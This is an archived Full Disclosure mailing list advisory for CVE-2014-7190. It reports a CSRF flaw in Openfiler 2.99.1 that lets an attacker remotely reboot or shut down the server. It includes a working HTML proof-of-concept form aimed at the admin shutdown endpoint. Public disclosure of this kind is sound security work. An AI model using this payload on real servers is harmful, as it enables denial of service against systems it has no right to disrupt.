Full Disclosure mailing list archives
Openfiler DoS via CSRF (CVE-2014-7190)
From: Dolev Farhi <dolevf () yahoo com>
Date: Fri, 26 Sep 2014 22:25:08 +0300
# Exploit author: @dolevff # Vendor homepage: http://www.openfiler.com # Affected Software version: 2.99.1 (latest) # Alerted vendor: 7.5.14 # CVE-2014-7190 Software Description ===================== Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based Storage Area Networking functionality in a single cohesive framework.Vulnerability Description
========================= it is possible to restart/shutdown a server running openfiler due to missing session tokens and cause a denial of service attack.
proof of concept: ========================= <html> <div align="center"> <pre> <h2><b>DoS<b></h2> <body> <form action="https://ip.add.re.ss:446/admin/system_shutdown.html" method="POST"> <input type="hidden" name="shutdowntype" value="reboot" /> <input type="hidden" name="delay" value="0" /> <input type="hidden" name="action" value="Shutdown" /> <input type="submit" name="submit" value="attack" /> </form> </body> </div> </html> _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Openfiler DoS via CSRF (CVE-2014-7190) Dolev Farhi (Sep 26)